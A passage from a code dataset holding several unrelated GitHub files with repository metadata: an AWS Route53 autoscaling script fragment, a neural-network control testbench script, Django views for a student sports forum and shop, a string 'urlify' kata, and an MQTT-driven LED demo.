get_ec2_ip() # get the list of IP's\n\tfor ec2_ip in ec2_ips:\n\t\tec2_ip_autoscaling_list.append({'Value': ec2_ip}) # manipulate the list to get formatted list of dicts to feed to the route53 function\n\tcreate_route53(hosted_zone_id, ec2_ip_autoscaling_list)\n\t\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"hsinghmann/aws","sub_path":"autoscaling_route53.py","file_name":"autoscaling_route53.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19652029422","text":"\"\"\"\nTesting/demonstration script for RTCFL with feedforward DNN actors. Performs poorly.\n\nMihir Savadi 2 May 2022\n\"\"\"\n\nfrom pdb import runcall\nfrom lib import *\n\nfrom control_feedback_testbench import base, plants, controllers, circuits, scheduler\n\n\nif __name__ == \"__main__\" :\n\n # first testing the purely feedforward based NN. Garbage performance.\n runObj = scheduler.scheduler(\n type='text',\n source='code/r_inputs/randomStep.csv',\n circuit=circuits.RTCFL_DNN(\n plant_bb = plants.FOPDT(params={'K' : 2.25, 'tau': 60.5, 'theta' : 9.9}),\n plant_nn = plants.DNN(name=\"plant_nn\", \n params={'n' : 500,\n 'hidden layers' : [750, 750],\n 'activation function' : torch.nn.ReLU,\n 'learning rate' : 0.001,\n 'device' : 'cpu'\n }),\n plant_minError = 5,\n plant_k = 1,\n plant_l = 1000,\n controller_nn = controllers.DNN(name=\"plant_nn\", \n params={'n' : 500,\n 'hidden layers' : [750, 750],\n 'activation function' : torch.nn.ReLU,\n 'learning rate' : 0.001,\n 'device' : 'cpu'\n }),\n controller_minLoss = 2000,\n controller_k = 1,\n controller_l = 1000\n )\n )\n # errorMem = [0.0]*500\n # while runObj.update(runAll=False) :\n # error = runObj.getCircuitInfo()['e'][-1]\n # errorMem.pop(0)\n # errorMem.append(error)\n # average = sum(errorMem)/len(errorMem)\n # print(f\"mode: {runObj.getCircuitInfo()['mode'][-1]},\\tr[t] = {runObj.getCircuitInfo()['r'][-1]},\\tu[t] = {round(runObj.getCircuitInfo()['y'][-1], 2)},\\terror = {round(error, 2)},\\taverage error = {round(average, 2)}\")\n\n totalIterations = 10000\n print(f'Running {totalIterations} iterations of the input.')\n for i in tqdm(range(totalIterations)) :\n if runObj.update(runAll=False) == False :\n break\n runObj.genPlot(printPlot=True)","repo_name":"mihirsavadi/control-feedback-testbench","sub_path":"code/test_rtcfl-DNN.py","file_name":"test_rtcfl-DNN.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29128571240","text":"from datetime import date\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError, ObjectDoesNotExist\nfrom django.core.validators import validate_email\nfrom django.db.models import Subquery, Avg, Q\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom .models import Message, Product, Size, ShoppingCart, Follows, Comment, Likes, BoughtProducts, SellerProduct, Review, FollowsForum\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n# Create your views here.\n\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse, Http404\nfrom django.urls import reverse, reverse_lazy\nfrom .models import Post, Forum, Client, Seller, Country, Team, Sport\nfrom .serializers import PostSerializer, CommentSerializer, UserSerializer, OwnerSerializer\n\nfrom django.contrib.auth import get_user_model\n\n\ndef seller_check(user):\n return Seller.objects.filter(user=user).exists()\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef index(request):\n user_type = None\n is_seller = False # Initialize is_seller as False\n\n if hasattr(request.user, 'client'):\n user_type = 'client'\n elif hasattr(request.user, 'seller'):\n user_type = 'seller'\n is_seller = True\n\n post_list = Post.objects.order_by('-created_at')\n liked_posts = Post.objects.filter(likes__user=request.user)\n product_list = Product.objects.order_by('-created_at')\n\n\n if user_type == 'client':\n User = get_user_model()\n client_user = User.objects.get(client=request.user.client)\n followed_forums = FollowsForum.objects.filter(user=client_user)\n\n followed_forums_post = []\n for forum in followed_forums:\n forum_posts = Post.objects.filter(forum=forum.forum)\n followed_forums_post += forum_posts\n else:\n User = get_user_model()\n client_user = User.objects.get(seller=request.user.seller)\n followed_forums = FollowsForum.objects.filter(user=client_user)\n\n followed_forums_post = []\n for forum in followed_forums:\n forum_posts = Post.objects.filter(forum=forum.forum)\n followed_forums_post += forum_posts\n request.session['user_type'] = user_type\n context = {\n 'post_list': post_list,\n 'product_list': product_list,\n 'user': request.user,\n 'is_seller': is_seller,\n 'liked_posts': liked_posts,\n 'followed_forums_post': followed_forums_post,\n }\n\n return render(request, 'sports24h/index.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef posts_index(request):\n post_list = Post.objects.order_by('-created_at')\n liked_posts = Post.objects.filter(likes__user=request.user)\n product_list = Product.objects.order_by('-created_at')\n is_seller = Seller.objects.filter(user=request.user).exists()\n context = {\n 'post_list': post_list,\n 'product_list': product_list,\n 'user': request.user,\n 'liked_posts': liked_posts,\n 'is_seller': is_seller\n }\n return render(request, 'sports24h/posts_index.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef products_index(request):\n product_list = Product.objects.order_by('-created_at')\n is_seller = Seller.objects.filter(user=request.user).exists()\n context = {\n 'product_list': product_list,\n 'user': request.user,\n 'is_seller': is_seller\n }\n return render(request, 'sports24h/products_index.html', context)\n\n\n@user_passes_test(seller_check, login_url=reverse_lazy('sports24h:access_denied'))\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef post(request):\n if not request.method == 'POST':\n forum_list = Forum.objects.order_by('-name')\n context = {\n 'forum_list': forum_list,\n }\n return render(request, 'sports24h/create_post.html', context)\n title = request.POST.get('title', '')\n forum = request.POST.get('forum', '')\n text = request.POST.get('text', '')\n s = Seller.objects.get(user=request.user)\n if title and forum and text:\n f = Forum.objects.get(name=forum)\n p = Post(owner=s, forum=f, title=title, text=text)\n p.save()\n return HttpResponseRedirect(reverse('sports24h:index'))\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user')) # TODO permitir apenas seller ter acesso a esta view\ndef delete_post(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n if post.owner.user == request.user:\n post.delete()\n return HttpResponseRedirect(reverse('sports24h:index'))\n\n\ndef client_check(user):\n return Client.objects.filter(user=user).exists()\n\n\ndef admin_check(user):\n return user.is_superuser or user.is_staff\n\n\ndef access_denied(request):\n return render(request, 'sports24h/accessdenied.html')\n\n\n@user_passes_test(seller_check, login_url=reverse_lazy('sports24h:access_denied'))\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef product(request):\n if not request.method == 'POST':\n forum_list = Forum.objects.order_by('-name')\n size_list = Size.objects.order_by('-name')\n context = {\n 'forum_list': forum_list,\n 'size_list': size_list\n }\n return render(request, 'sports24h/create_product.html', context)\n name = request.POST.get('name')\n size = request.POST.get('size')\n forum = request.POST.get('forum')\n price = request.POST.get('price')\n photo = request.FILES['photo']\n if name and size and photo and forum and price:\n seller = Seller.objects.get(user=request.user)\n s = Size.objects.get(name=size)\n f = Forum.objects.get(name=forum)\n p = Product.objects.create(owner=seller, name=name, size=s, photo=photo, price=price, forum=f)\n return HttpResponseRedirect(reverse('sports24h:index'))\n else:\n context = {\n 'error_message': \"Please, check if the fields are correctly filled.\",\n }\n return render(request, 'sports24h/product.html', context)\n\n\n@user_passes_test(seller_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef delete_product(request, product_id):\n product = get_object_or_404(Product, id=product_id)\n if product.owner.user == request.use:\n product.delete()\n return HttpResponseRedirect(reverse('sports24h:index'))\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef follow_user(request):\n if request.method == 'POST':\n user_id = request.POST.get('user_id')\n user = User.objects.get(id=user_id)\n follows, created = Follows.objects.get_or_create(following_user=request.user, followed_user=user)\n if created:\n follows.save()\n return redirect('sports24h:search_users')\n else:\n return redirect('sports24h:search_users')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef search_users(request):\n if not request.method == 'POST':\n followed_user_ids = Follows.objects.filter(\n following_user=request.user\n ).values_list('followed_user__id', flat=True)\n followed_users = User.objects.filter(\n id__in=followed_user_ids\n )\n context = {\n 'followed_users': followed_users\n }\n\n return render(request, 'sports24h/search_users.html', context)\n search_query = request.POST.get('search_query')\n followed_user_ids = Follows.objects.filter(\n following_user=request.user\n ).values_list('followed_user__id', flat=True)\n\n # filter the search results to exclude followed users\n users = User.objects.filter(\n username__icontains=search_query\n ).exclude(\n id=request.user.id\n ).exclude(\n id__in=followed_user_ids\n )\n\n # get the list of User objects of the followed users\n followed_users = User.objects.filter(\n id__in=followed_user_ids\n )\n\n context = {\n 'users': users,\n 'followed_users': followed_users\n }\n return render(request, 'sports24h/search_users.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef unfollow_user(request):\n user_id = request.POST.get('user_id')\n followed_user = get_object_or_404(User, id=user_id)\n if user_id is not None:\n follow = Follows.objects.get(following_user=request.user, followed_user=followed_user)\n follow.delete()\n return redirect('sports24h:search_users')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef product_detail(request, product_id):\n product = get_object_or_404(Product, pk=product_id)\n is_owner = Seller.objects.filter(user=request.user).exists()\n average_rating = Review.objects.filter(product=product).aggregate(Avg('rating'))['rating__avg']\n context = {\n 'product': product,\n 'is_owner': is_owner,\n 'average_rating': average_rating\n }\n return render(request, 'sports24h/product_detail.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef post_detail(request, post_id):\n post = get_object_or_404(Post.objects.select_related('owner__user'), pk=post_id)\n comments = Comment.objects.filter(post=post)\n is_owner = Seller.objects.filter(user=request.user).exists()\n context = {\n 'post': post,\n 'comments': comments,\n 'is_owner': is_owner\n }\n return render(request, 'sports24h/post_detail.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef add_comment(request):\n if request.method == 'POST':\n comment_text = request.POST.get(\"comment_text\")\n post_id = request.POST.get(\"post_id\")\n post = Post.objects.get(pk=post_id)\n if comment_text.contains('ola') or comment_text.contains('adeus') or comment_text.contains('aqui'):\n context = {\n 'error_message': \"Please, check if the fields are correctly filled.\",\n }\n return render(request, 'sports24h/accessdenied.html', context)\n\n Comment.objects.create(user=request.user, post=post, text=comment_text)\n return redirect('sports24h:post_detail', post_id=post_id)\n else:\n return redirect('sports24h:index')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef size(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/create_size.html')\n name = request.POST.get('name')\n if name:\n s = Size(name=name)\n s.save()\n return HttpResponseRedirect(reverse('sports24h:index'))\n else:\n context = {\n 'error_message': \"Please, check if the fields are correctly filled.\",\n }\n return render(request, 'sports24h/create_size.html', context=context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef sport(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/create_sport.html')\n name = request.POST.get('name')\n if name:\n s = Sport(name=name)\n s.save()\n return HttpResponseRedirect(reverse('sports24h:index'))\n else:\n context = {\n 'error_message': \"Please, check if the fields are correctly filled.\",\n }\n return render(request, 'sports24h/create_sport.html', context=context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef country(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/create_country.html')\n name = request.POST.get('name')\n if name:\n c = Country(name=name)\n c.save()\n return HttpResponseRedirect(reverse('sports24h:index'))\n else:\n context = {\n 'error_message': \"Please, check if the fields are correctly filled.\",\n }\n return render(request, 'sports24h/create_country.html', context=context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef team(request):\n if not request.method == 'POST':\n context = {\n 'country_list': Country.objects.all,\n }\n return render(request, 'sports24h/create_team.html', context)\n name = request.POST.get('name')\n country = request.POST.get('countries')\n if name and country:\n t = Team(name=name, country=country)\n t.save()\n return HttpResponseRedirect(reverse('sports24h:index'))\n else:\n context = {\n 'error_message': \"Please, check if the fields are correctly filled.\",\n 'country_list': Country.objects.all,\n }\n return render(request, 'sports24h/create_team.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef forums_index(request):\n user_followed_forums = request.user.followsforum_set.all().values_list('forum__id', flat=True)\n forum_list = Forum.objects.exclude(id__in=user_followed_forums).order_by('-name')\n followed_forums = Forum.objects.filter(id__in=user_followed_forums).order_by('-name')\n context = {\n 'forums': forum_list,\n 'followed_forums': followed_forums,\n }\n return render(request, 'sports24h/forums_index.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef follow_forum(request):\n if not request.method == 'POST':\n return forums_index(request)\n\n forum_id = request.POST.get('forum_id')\n forum = get_object_or_404(Forum, pk=forum_id)\n follow = FollowsForum.objects.create(user=request.user, forum=forum)\n return forums_index(request)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef unfollow_forum(request):\n if not request.method == 'POST':\n return forums_index(request)\n\n forum_id = request.POST.get('forum_id')\n forum = get_object_or_404(Forum, pk=forum_id)\n follow = FollowsForum.objects.get(user=request.user, forum=forum)\n follow.delete()\n return forums_index(request)\n\n\ndef forum(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/create_forum.html')\n name = request.POST.get('forum_name')\n genre = request.POST.get('genre')\n if name and genre:\n Forum.objects.create(name=name, genre=genre)\n return HttpResponseRedirect(reverse('sports24h:forums_index'))\n else:\n context = {\n 'error_message': \"Please, check if the fields are correctly filled.\",\n }\n return render(request, 'sports24h/create_forum.html', context=context)\n\n\ndef register_user(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/register.html')\n passwd = request.POST.get('password')\n confirm_passwd = request.POST.get('confirm_password')\n\n if passwd != confirm_passwd:\n context = {\n 'error_message': \"Passwords don't match\",\n }\n return render(request, 'sports24h/register.html', context=context)\n username = request.POST.get('username')\n user_type = request.POST.get('user_type')\n email = request.POST.get('email')\n passwd = request.POST.get('password')\n birthdate_str = request.POST.get('birthdate')\n\n # Check if any of the required fields are empty\n if not (username and user_type and email and passwd and birthdate_str):\n context = {\n 'error_message': \"Please, fill all the fields.\",\n }\n return render(request, 'sports24h/register.html', context=context)\n\n if User.objects.filter(username=username).exists():\n context = {\n 'error_message': \"The username is already in use! Please, choose another one.\",\n }\n return render(request, 'sports24h/register.html', context)\n\n try:\n validate_email(email)\n except ValidationError:\n # Invalid email format\n context = {\n 'error_message': \"Please introduce a valid e-mail.\",\n }\n return render(request, 'sports24h/register.html', context=context)\n\n if len(passwd) < 8:\n # Password is too short\n context = {\n 'error_message': \"Password should have at least 8 characters.\",\n }\n return render(request, 'sports24h/register.html', context=context)\n\n birthdate = date.fromisoformat(birthdate_str)\n if (date.today() - birthdate).days < 365 * 18:\n # User is not yet 18 years old\n context = {\n 'error_message': \"You must be 18 years or older.\",\n }\n return render(request, 'sports24h/register.html', context=context)\n\n u = User.objects.create_user(username=username, email=email, password=passwd)\n\n if user_type == 'client':\n Client.objects.create(user=u, birthdate=birthdate)\n elif user_type == 'seller':\n Seller.objects.create(user=u, birthdate=birthdate)\n return HttpResponseRedirect(reverse('sports24h:login_user'))\n\n\ndef login_user(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/login.html')\n username = request.POST['username']\n passwd = request.POST['password']\n\n if username and passwd:\n user = authenticate(username=username, password=passwd)\n\n if user is not None:\n # user exists\n login(request, user)\n if hasattr(request.user, 'client'):\n request.session['photo'] = request.user.client.photo.url\n elif hasattr(request.user, 'seller'):\n request.session['photo'] = request.user.seller.photo.url\n return HttpResponseRedirect(reverse('sports24h:index'))\n else:\n # user doesn't exist\n context = {\n 'error_message': \"The username doesn't exist in the database!\",\n }\n return render(request, 'sports24h/login.html', context)\n\n\ndef logout_user(request):\n if not request.method == 'POST':\n return render(request, 'sports24h/logout.html')\n logout(request)\n request.session.flush()\n return HttpResponseRedirect(reverse('sports24h:login_user'))\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef profile(request):\n if not request.method == 'POST':\n if hasattr(request.user, 'client'):\n c = Client.objects.get(user=request.user)\n\n elif hasattr(request.user, 'seller'):\n c = Seller.objects.get(user=request.user)\n followers_count = Follows.objects.filter(followed_user=request.user).count()\n context = {\n 'nr_followers': followers_count,\n 'c': c,\n 'countries': Country.objects.all(),\n 'teams': Team.objects.all(),\n 'sports': Sport.objects.all()\n }\n return render(request, 'sports24h/profile.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef other_user_profile(request, user_id):\n user_information = None\n try:\n user = User.objects.get(pk=user_id)\n if hasattr(user, 'client'):\n user_information = Client.objects.get(user=user)\n elif hasattr(user, 'seller'):\n user_information = Seller.objects.get(user=user)\n except User.DoesNotExist:\n raise Http404(\"User does not exist\")\n followers_count = Follows.objects.filter(followed_user=user).count()\n context = {\n 'user': user,\n 'user_information': user_information,\n 'nr_followers': followers_count\n }\n return render(request, 'sports24h/other_user_profile.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef delete_account(request):\n request.user.delete()\n return HttpResponseRedirect(reverse('sports24h:login_user'))\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef set_country(request):\n if request.method == 'POST':\n country = request.POST.get('country')\n if hasattr(request.user, 'client'):\n c = Client.objects.get(user=request.user)\n elif hasattr(request.user, 'seller'):\n c = Seller.objects.get(user=request.user)\n if country:\n country, created = Country.objects.get_or_create(name=country)\n c.country = country\n c.save()\n return redirect('sports24h:profile')\n return redirect('sports24h:profile')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef set_favoriteTeam(request):\n if request.method == 'POST':\n teamCountry = request.POST.get('teamCountry')\n teamName = request.POST.get('teamName')\n if hasattr(request.user, 'client'):\n c = Client.objects.get(user=request.user)\n elif hasattr(request.user, 'seller'):\n c = Seller.objects.get(user=request.user)\n else:\n return render(request, 'sports24h/profile.html',\n {'set_profile_setting': \"Error trying to change the profile\"})\n if teamCountry and teamName:\n country, created = Country.objects.get_or_create(name=teamCountry)\n if created:\n country.save()\n team, created = Team.objects.get_or_create(name=teamName, country=country)\n if created:\n team.save()\n c.favorite_team = team\n c.save()\n return redirect('sports24h:profile')\n\n return redirect('sports24h:profile')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef set_favoriteSport(request):\n if request.method == 'POST':\n sportName = request.POST.get('sportName')\n if hasattr(request.user, 'client'):\n c = Client.objects.get(user=request.user)\n elif hasattr(request.user, 'seller'):\n c = Seller.objects.get(user=request.user)\n else:\n return redirect('sports24h:profile')\n if sportName:\n sport, created = Sport.objects.get_or_create(name=sportName)\n if created:\n sport.save()\n c.favorite_sport = sport\n c.save()\n request.user = c\n return redirect('sports24h:profile')\n\n return redirect('sports24h:profile')\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef upload_photo(request):\n if request.method == 'POST' and len(request.FILES) == 0:\n return render(request, 'sports24h/profile.html',\n {'uploaded_file_status': \"Please select a photo\"})\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n if Client.objects.filter(user=request.user).exists():\n c = Client.objects.get(user=request.user)\n c.photo.save(myfile.name, myfile)\n c.save()\n request.session['photo'] = c.photo.url\n elif Seller.objects.filter(user=request.user).exists():\n s = Seller.objects.get(user=request.user)\n s.photo.save(myfile.name, myfile)\n s.save()\n request.session['photo'] = s.photo.url\n\n followers_count = Follows.objects.filter(followed_user=request.user).count()\n context = {\n 'nr_followers': followers_count,\n 'c': c,\n 'countries': Country.objects.all(),\n 'teams': Team.objects.all(),\n 'sports': Sport.objects.all(),\n 'uploaded_file_status': \"Photo updated successfully\"\n }\n return render(request, 'sports24h/profile.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef reset_photo(request):\n user = request.user\n default_photo_path = '/sports24h/static/media/users/default-user-icon.png'\n if hasattr(user, 'client'):\n request.session['photo'] = default_photo_path\n user.client.save()\n elif hasattr(user, 'seller'):\n request.session['photo'] = default_photo_path\n user.seller.save()\n return render(request, 'sports24h/profile.html',\n {'uploaded_file_status': \"Photo removed successfully\"})\n\n\n@user_passes_test(client_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef shopping_cart(request):\n if request.method != \"POST\":\n try:\n client = Client.objects.get(user=request.user)\n cart = ShoppingCart.objects.get(client=client)\n cart_items = cart.product_list.all()\n except ObjectDoesNotExist:\n cart_items = []\n\n context = {\n 'cart_items': cart_items,\n }\n return render(request, 'sports24h/shopping_cart.html', context)\n\n\n@user_passes_test(client_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef buy_products(request):\n if request.method == \"POST\":\n client = request.user.client\n shopping_cart = ShoppingCart.objects.get(client=client)\n products = shopping_cart.product_list.all()\n bought_products, _ = BoughtProducts.objects.get_or_create(client=client)\n bought_products.product_list.add(*products)\n shopping_cart.product_list.clear()\n return redirect('sports24h:bough_products')\n\n\n@user_passes_test(client_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef add_review(request, product_id):\n rating = request.POST.get('rating_value')\n if not rating:\n return redirect('sports24h:bough_products')\n product = Product.objects.get(id=product_id)\n client = request.user.client\n review = Review.objects.create(\n client=client,\n product=product,\n rating=rating,\n )\n review.save()\n return redirect('sports24h:bough_products')\n\n\n@user_passes_test(client_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef bough_products(request):\n if request.method != \"POST\":\n client = request.user.client\n bought_products = BoughtProducts.objects.filter(client=client)\n\n if bought_products.exists():\n products = bought_products.first().product_list.all()\n product_ids = list(products.values_list('id', flat=True))\n reviewed_products = Product.objects.filter(review__client=client, id__in=product_ids).distinct()\n unreviewed_products = Product.objects.filter(\n ~Q(review__client=client),\n id__in=product_ids\n ).distinct()\n else:\n reviewed_products = Product.objects.none()\n unreviewed_products = Product.objects.none()\n\n context = {\n 'reviewed_products': reviewed_products,\n 'unreviewed_products': unreviewed_products,\n }\n return render(request, 'sports24h/bough_products.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef seller_products(request):\n sp_items = Product.objects.filter(owner__user=request.user)\n\n context = {\n 'sp_items': sp_items,\n }\n return render(request, 'sports24h/seller_products.html', context)\n\n\n@user_passes_test(client_check)\n@login_required(login_url=reverse_lazy('sports24h:login_user')) # TODO fazer isto acesssivel apenas a users com @client\ndef add_to_cart(request, product_id):\n if not hasattr(request.user, 'client'):\n return HttpResponseRedirect(reverse('sports24h:index'))\n\n client = Client.objects.get(user=request.user)\n try:\n shopping_cart = ShoppingCart.objects.get(client=client)\n except ObjectDoesNotExist:\n shopping_cart = ShoppingCart.objects.create(client=client)\n\n product = Product.objects.get(id=product_id)\n shopping_cart.product_list.add(product)\n\n return HttpResponseRedirect(reverse('sports24h:index'))\n\n\n@user_passes_test(client_check)\ndef remove_from_cart(request, product_id):\n client = Client.objects.get(user=request.user)\n shopping_cart = ShoppingCart.objects.get(client=client)\n product = Product.objects.get(id=product_id)\n shopping_cart.product_list.remove(product)\n\n return HttpResponseRedirect(reverse('sports24h:shopping_cart'))\n\n\ndef send_message_html(request):\n messages_list = Message.objects.filter(recipient=request.user).order_by('-sent_at')\n paginator = Paginator(messages_list, 10) # Show 10 messages per page\n\n page = request.GET.get('page')\n try:\n messages = paginator.page(page)\n except PageNotAnInteger:\n messages = paginator.page(1)\n except EmptyPage:\n messages = paginator.page(paginator.num_pages)\n\n return render(request, 'sports24h/send_message.html', {'messages': messages})\n\n\ndef sent_messages_html(request):\n messages_list = Message.objects.filter(sender=request.user).order_by('-sent_at')\n paginator = Paginator(messages_list, 10) # Show 10 messages per page\n\n page = request.GET.get('page')\n try:\n messages = paginator.page(page)\n except PageNotAnInteger:\n messages = paginator.page(1)\n except EmptyPage:\n messages = paginator.page(paginator.num_pages)\n\n return render(request, 'sports24h/sent_messages.html', {'messages': messages})\n\n\ndef about_index(request):\n return render(request, 'sports24h/about.html')\n\n\ndef inbox(request):\n messages = Message.objects.filter(recipient=request.user).order_by('-sent_at')\n return render(request, 'sports24h/send_message.html', {'messages': messages})\n\n\ndef send_message_submit(request):\n if request.method == 'POST':\n recipient_username = request.POST['recipient']\n content = request.POST['message']\n\n try:\n recipient = User.objects.get(username=recipient_username)\n message = Message(sender=request.user, recipient=recipient, content=content)\n message.save()\n return redirect('sports24h:index')\n except User.DoesNotExist:\n return render(request, 'sports24h/send_message.html', {'error': 'Destinatário não encontrado'})\n\n return render(request, 'sports24h/send_message.html')\n\n\n@user_passes_test(client_check)\ndef like(request, post_id):\n post = Post.objects.get(pk=post_id)\n try:\n like = Likes.objects.get(user=request.user, post=post)\n like.delete()\n post.likes_count -= 1\n except ObjectDoesNotExist:\n Likes.objects.create(user=request.user, post=post)\n post.likes_count += 1\n post.save()\n return redirect(request.META['HTTP_REFERER'])\n\n\n@user_passes_test(lambda u: u.is_superuser, login_url=reverse_lazy('sports24h:login_user'))\ndef admin(request):\n return render(request, 'sports24h/admin_options.html')\n\n\n#### VIEWS REACT\n@api_view(['GET', 'POST']) # (3)\ndef post_list(request):\n if request.method == 'GET': # (4)\n posts = Post.objects.all()\n serializerP = PostSerializer(posts, context={'request': request}, many=True)\n return Response(serializerP.data)\n elif request.method == 'POST': # (4)\n serializer = PostSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['PUT', 'DELETE'])\ndef post_edita(request, pk):\n try:\n post = Post.objects.get(pk=pk)\n except Post.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n if request.method == 'PUT':\n serializer = PostSerializer(post, data=request.data, context={'request': request})\n if serializer.is_valid():\n serializer.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n post.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET', 'POST']) # (3)\ndef comment_list(request):\n if request.method == 'GET': # (4)\n comments = Comment.objects.all()\n serializerC = CommentSerializer(comments, context={'request': request}, many=True)\n return Response(serializerC.data)\n elif request.method == 'POST': # (4)\n serializer = CommentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"diogocardoso777/projeto_DIAM","sub_path":"sitediam/sports24h/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":32374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32053615464","text":"\"\"\"\nReplace spaces with %20 (in place)\n\"\"\"\n\ndef urlify(source):\n \"\"\"\n >>> urlify('ab c ')\n 'ab%20c'\n >>> urlify(' b a ')\n '%20b%20%20a'\n \"\"\"\n source = list(source)\n read = write = len(source) - 1\n\n # Find last letter\n while source[read] == ' ':\n read -= 1\n \n while read >= 0:\n item = source[read]\n if item != ' ':\n source[write] = item\n write -= 1\n else:\n source[write] = '0'\n source[write - 1] = '2'\n source[write - 2] = '%'\n write -= 3\n read -= 1\n\n return ''.join(source)","repo_name":"graffic/katas","sub_path":"cracking_interview/ch1/q3_urlify.py","file_name":"q3_urlify.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11082679342","text":"\"\"\"\nDemo/test program for the MQTT utilities.\nSee https://github.com/sensemakersamsterdam/astroplant_explorer\n\"\"\"\n#\n# (c) Sensemakersams.org and others. See https://github.com/sensemakersamsterdam/astroplant_explorer\n# Author: Gijs Mos\n#\n# Warning: if import of ae_* modules fails, then you need to set up PYTHONPATH.\n# To test start python, import sys and type sys.path. The ae module directory\n# should be included.\n\nfrom ae_util.configuration import cfg\nfrom ae_util.mqtt import AE_Local_MQTT\nfrom ae_drivers import AE_Pin\nfrom ae_drivers.led import AE_LED\nfrom time import sleep\nimport sys\n#\n# Setup our local MQTT agent. Parameters are obtained from the ./configuration.json file.\nloc_mqtt = AE_Local_MQTT()\nloc_mqtt.setup()\n\nled = AE_LED('led', 'The red LED', AE_Pin.D20)\nled.setup()\n\nstop = False\n\n\ndef cb1(sub_topic, payload, rec_time):\n print('call_back 1:', sub_topic, payload, rec_time)\n if sub_topic == 'button1' and payload == 'True':\n print ('led on')\n led.value(1) \n elif sub_topic == 'button1' and payload == 'False':\n print ('led off')\n led.value(0)\n else:\n print ('not for me...')\n\ndef cb_stop(sub_topic, payload, rec_time):\n global stop\n print('Received stop request. mqtt_receiver_demo bailing out!')\n stop = True\n\n# This led receiver listens to topic 'button1'\nloc_mqtt.subscribe('button1/#', cb1)\n\nloc_mqtt.subscribe('control/stop', cb_stop)\n\nprint('Abort with control-c to end prematurely.')\ntry:\n while not stop:\n sub_topic, payload, rec_time = loc_mqtt.get_message()\n if sub_topic is not None:\n print('Dequeued:', sub_topic, payload, rec_time)\n sleep(0.1)\nexcept KeyboardInterrupt:\n print('\\nManually aborted....\\nBye 